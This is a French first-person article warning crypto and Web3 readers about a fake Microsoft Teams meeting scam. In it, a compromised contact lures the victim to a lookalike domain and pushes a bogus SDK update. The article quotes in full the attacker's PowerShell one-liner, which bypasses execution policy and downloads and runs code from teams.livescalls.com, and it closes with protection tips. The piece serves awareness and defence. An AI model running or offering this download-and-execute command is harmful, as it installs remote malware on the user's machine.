J'ai failli me faire pirater lors d'un appel Microsoft Teams : voici comment fonctionne l'arnaque

Permettez-moi de vous raconter comment j'ai failli devenir victime d'une escroquerie sociale élaborée, conçue pour exploiter une chose aussi banale et apparemment inoffensive qu'un appel Microsoft Teams plus tôt dans la journée. 

Pendant la majeure partie de l'interaction, rien ne semblait anormal. 

Une personne que je pensais être un contact du secteur m'a contacté pour organiser une réunion sur Microsoft Teams, et mon esprit de collaboration m'a immédiatement permis de participer à l'appel. 

Attention, divulgation : la personne à l’autre bout du fil était un imposteur et a tenté de me faire exécuter un code malveillant sur mon ordinateur. 

Je relate ici toute cette expérience à titre d'avertissement pour mes amis, mes connaissances et mes contemporains de la communauté crypto et Web3. 

Ça a failli être moi aujourd'hui ; ça pourrait être quelqu'un d'autre demain. 

Étape 1 : La mise en place — « On se reparle, vieux pote ! » 

Lorsque vous recevez un message du compte Telegram d'une personne que vous connaissez comme un cadre supérieur d'une agence de relations publiques spécialisée dans les cryptomonnaies, la dernière chose à laquelle vous pensez est que vous êtes en train de vous faire piéger par une tentative d'hameçonnage. 

Aucun des signaux d'alarme habituels n'était immédiatement apparent non plus. 

Ce n'était pas un message privé aléatoire. 

Je ne parlais pas à un compte usurpateur où le « i » est subtilement remplacé par un « l » 

J'avais en fait un historique de conversations avec ce compte, donc je pensais avoir affaire à une vraie personne à l'autre bout du fil. 

Rien ne semblait anormal lorsqu'ils ont entamé une conversation tout à fait amicale pour renouer le contact. Très vite, un lien Calendly a permis de réserver une réunion de 30 minutes, ainsi qu'une invitation à un appel Microsoft Teams.

Comme je l'ai dit précédemment, je n'ai jamais douté de rien durant cet échange. J'ai perçu le même professionnalisme et la même patience que l'on attendrait d'un cadre supérieur d'une grande agence de relations publiques. 

Je savais seulement que j'avais programmé une réunion Teams depuis la page Calendly d'un contact du secteur.

L'escroc prend contact en utilisant un compte piraté, en envoyant un lien de réunion Teams.

Étape 2 : Le piège du « Rejoindre uniquement depuis un ordinateur » 

Le jour de la réunion est arrivé et j'ai cliqué sur le lien Teams sur mon téléphone, comme je l'avais fait au moins mille fois auparavant. Cependant, contrairement à mon habitude, je n'ai pas accédé directement à la réunion. Au lieu d'être redirigé vers l'appel, un message est apparu : « L'accès à cette réunion via des appareils mobiles est interdit en raison des paramètres de l'organisateur. » 

« Oh oh ! Ça ne m'est jamais arrivé auparavant. » 

Eh bien, ce n'était pas undent non plus. 

Avec le recul, c'était probablement le premier véritable signal d'alarme. 

L'écran d'erreur fait partie intégrante du dispositif. Les escrocs ont besoin que vous utilisiez un ordinateur de bureau ou portable, car leur programme malveillant est un script en ligne de commande qui ne fonctionne que sur PC.

L'URL affichée dans votre navigateur «teams.livescalls.com » n'est PAS le véritable domaine Microsoft. 

Les réunions Teams légitimes utilisent teams.microsoft.com ou teams.live.com. 

Le domaine « livescalls.com » ressemble assez à l'original de loin, mais alors là, il est loin d'être authentique quand on regarde de plus près. 

L'un est un site contrôlé par Microsoft qui revendique plus de 320 millions d'utilisateurs actifs quotidiens. L'autre est un site entièrement factice, contrôlé par les attaquants. 

Certes, certaines organisations utilisent des noms de domaine personnalisés pour leurs réunions d'équipe. Cependant, les plus de 1 000 milliards de dollars de pertes dues aux escroqueries en 2025, selon le Forum économique mondial, m'ont suffi pour ne pas ignorer mon intuition. 

La fausse page « Avis d’accès à l’équipe » bloque l’accès mobile, obligeant les victimes à utiliser un ordinateur sur lequel le script malveillant peut s’exécuter. Notez l’URL : teams.livescalls.com — il ne s’agit pas d’un domaine Microsoft.

L’escroc fait pression sur la victime pour qu’elle se connecte sur ordinateur après le blocage sur mobile, en prétendant que « des partenaires l’attendent »

Étape 3 : La charge utile — « Mettez à jour votre SDK TeamsFx »

Une fois sur l'ordinateur, la fausse réunion Teams affichait une page au design professionnel, semblable à celle de la documentation officielle de Microsoft. Elle reprenait même des informations officielles de Microsoft concernant l'obsolescence du SDK TeamsFx prévue pour septembre 2025. 

La solution ? Copiez un bloc de code et exécutez-le dans votre terminal ou invite de commandes.

Si vous aviez fait une recherche supplémentaire sur Google, vous auriez constaté qu'un SDK similaire existe. Vous n'en avez simplement pas besoin pour cet appel d'équipe. 

Le code semble inoffensif au premier abord : il définit des variables d’environnement aux noms à consonance officielle, comme TeamsFx_API_KEY et MS_Teams_API_SECRET. Mais le véritable vecteur d’attaque se cache quelque part au milieu, et ces attaquants ne comptent pas sur votre vigilance

powershell -ep bypass -c "(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex"

Cette simple ligne contourne les politiques de sécurité de PowerShell (-ep bypass), télécharge le code depuis le serveur de l'attaquant et l'exécute immédiatement (iex = Invoke-Expression). 

Et voilà, le logiciel malveillant, l'enregistreur de frappe ou l'outil d'accès à distance hébergé par les attaquants est installé silencieusement sur votre appareil.

L'interface de réunion Teams truquée affiche la page malveillante « Mise à jour du SDK TeamsFx » aux participants. Remarquez que les participants à l'appel sont des vidéos générées par IA.

Étape 4 : La phase de pression « Ne vous inquiétez pas, c’est sans danger »

Lorsque j'ai exprimé des hésitations quant à l'exécution du script, l'imposteur a immédiatement combiné des paroles rassurantes et des pressions. 

La phrase « Ne vous inquiétez pas, c'est très simple et sans danger pour vous » était censée me rassurer et m'amener à suivre les instructions de la capture d'écran me montrant comment ouvrir l'invite de commandes sur mon PC. 

« Nos partenaires nous ont déjà rejoints sur Zoom », était censé me faire ressentir la pression de ne pas avoir à obliger tout le monde à changer de plateforme parce que je n’arrivais pas à exécuter une simple invite de commandes.

Je n'ai pas été rassuré. Je n'ai subi aucune pression non plus.

Quand j'ai proposé de passer à Google Meet, ils ont refusé. Apparemment, leur arnaque ne fonctionne qu'avec leur fausse configuration Teams.

L'escroc envoie des instructions étape par étape pour exécuter le code malveillant, en rassurant la victime : « Ne vous inquiétez pas, c'est très simple et sans danger pour vous. »

Étape 5 : Bluff démasqué — Bloqué et supprimé

Après avoir vérifié le script et le domaine, mes soupçons se sont confirmés : j’étais victime de manipulation sociale et j’étais à deux doigts de figurer dans les statistiques 2026 du Forum économique mondial. 

J'ai dit directement à l'escroc : « Je viens de vérifier et cette commande et le site web indiqué ne sont pas légitimes. Malheureusement, je ne pourrai pas le faire. » Je lui ai proposé de poursuivre la conversation sur Google Meet s'il souhaitait toujours discuter.

« Mais la réunion est en cours », fut le message reçu de l'autre côté. 

Comme prévu, leur réponse visait à me faire prendre conscience de l'urgence de participer à la réunion. Après tout, je ne voulais pas faire attendre trop longtemps tous ces partenaires.

Quelques instants plus tard, ils ont supprimé toute notre correspondance et m'ont bloqué. 

Ah… Ce n'est pas qu'un simple signal d'alarme. C'est carrément inquiétant. 

Les contacts professionnels ne suppriment pas tout leur historique de conversations pour vous bloquer dès que vous posez une question sur une mise à jour logicielle.

Une fois l'escroquerie dénoncée, l'attaquant insiste sur le fait que la réunion est « en cours » avant de supprimer tous les messages et de bloquer la victime.

Comment se protéger

Ce type d'attaque se multiplie dans les secteurs des cryptomonnaies, du Web3 et des technologies. Les escrocs compromettent ou usurpent l'identité de comptes réels appartenant à des professionnels des relations publiques, des investisseurs et des chefs de projet afin de cibler des personnes influentes. Voici comment s'en protéger :

• N'exécutez jamais de commandes depuis une page de réunion. Aucune plateforme de visioconférence légitime ne vous demandera jamais de coller du code dans votre terminal ou votre invite de commandes.
• Vérifiez l'URL. Les véritables réunions Microsoft Teams se déroulent sur teams.microsoft.com ou teams.live.com, et non sur « teams.livescalls.com » ou tout autre domaine similaire.
• Méfiez-vous des exigences « ordinateur de bureau uniquement ». Si une réunion bloque l’accès mobile, c’est une tactique délibérée pour vous forcer à utiliser une machine capable d’exécuter des scripts.
• Vérifiez l'identité de la personne par un autre moyen. Si un contact connu vous envoie un lien de réunion inhabituel, appelez-le directement ou contactez-le via une autre plateforme pour confirmation.
• Attention aux commandes « powershell -ep bypass » et « iex ». Ce sont les deux principaux signaux d'alarme dans un script. La première désactive la sécurité, la seconde exécute du code téléchargé sans autorisation.
• Si vous avez déjà exécuté le script : déconnectez-vous immédiatement d’Internet. Effectuez une analyse complète à la recherche de logiciels malveillants (Malwarebytes, Windows Defender Offline). Modifiez tous vos mots de passe depuis un appareil différent et non sécurisé. Surveillez vos portefeuilles de cryptomonnaies et vos comptes bancaires afin de détecter toute transaction non autorisée.

Pourquoi c'est important pour les cryptomonnaies et le Web3

Je ne qualifierais pas cela d'interaction de phishing typique, où les attaquants ratissent large et voient ce qu'ils ramènent. 

Non, il s'agissait d'une opération d'ingénierie sociale ciblée, menée sur plusieurs jours. Pendant plusieurs jours, les attaquants se sont fait passer pour des experts du secteur, établissant un lien de confiance et vous guidant discrètement vers la résolution d'un problème technique lors d'un appel Teams, via une fausse page Microsoft très convaincante. 

Qu’ils volent vosdent, vident votre portefeuille de cryptomonnaies ou installent un logiciel malveillant d’accès à distance persistant, les attaquants ont tout à gagner et rien à perdre. 

Si vous êtes fondateur, investisseur ou toute personne impliquée dans le secteur des cryptomonnaies et des technologies, partagez cet article avec votre équipe. Les arnaqueurs sont de plus en plus habiles, et la vigilance est la seule protection.